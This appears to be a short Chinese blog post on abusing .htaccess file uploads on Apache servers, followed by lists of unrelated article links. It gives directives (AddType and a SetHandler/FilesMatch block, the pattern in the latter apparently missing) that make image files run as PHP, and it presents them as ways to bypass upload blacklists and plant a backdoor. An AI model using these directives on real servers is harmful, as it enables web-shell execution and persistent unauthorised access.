.htaccess文件上传利用
2024-08-28 01:57:42
一般.htaccess可以用来留后门和针对黑名单绕过
创建一个txt写入
AddType application/x-httpd-php .png
打开另存为
保存类型为所有文件
上传.htaccess 必须是网站根路径
让png解析为php
2.留后门 可以在.htaccess 加入php解析规则
类似于把文件名包含1的解析成php
<FilesMatch "">
SetHandler application/x-httpd-php
</FilesMatch>
123456.png 就会以php执行
最新文章
- ajax验证登录注册
- Spark的优点
- POJ1265——Area(Pick定理+多边形面积)
- 机器学习笔记1——Introduction
- iOS: 学习笔记, 值与引用类型(译自: https://developer.apple.com/swift/blog/ Aug 15, 2014 Value and Reference Types)
- 图片与文字在div里实现垂直水平都居中
- 解决 win10 预览版开始菜单打不开的问题
- i++和++i以及左值,右值
- HTTP协议--状态码
- 解决 git extensions 每次提交需要输入用户名和密码
- iOS 10权限崩溃问题
- java线程(二)
- 初入前端框架bootstrap--Web前端
- 强化学习(十)Double DQN (DDQN)
- Educational Codeforces Round 5
- 小白的python之路11/3总结
- spark SQL读取ORC文件从Driver启动到开始执行Task(或stage)间隔时间太长(计算Partition时间太长)且产出orc单个文件中stripe个数太多问题解决方案
- 【演变】Ajax(AjAj)到WebSocket
- 小白的CTF学习之路1——程序与CPU
- RabbitMq (1)
热门文章
- HTML5实现首页动态视频背景
- JavaScript之对象基础
- 使用python asyncio+aiohttp做接口测试(TODO)
- Multiple types were found that match the controller named &#39;Auth&#39;.
- Spring Security 梳理 - DelegatingFilterProxy
- Tornado基础学习篇
- Django之使用celery和NGINX生成静态页面实现性能优化
- java递归求八皇后问题解法
- 如何评价一个VR体验设计?
- linux mint 19.2与Windows 10 双系统硬盘安装与卸载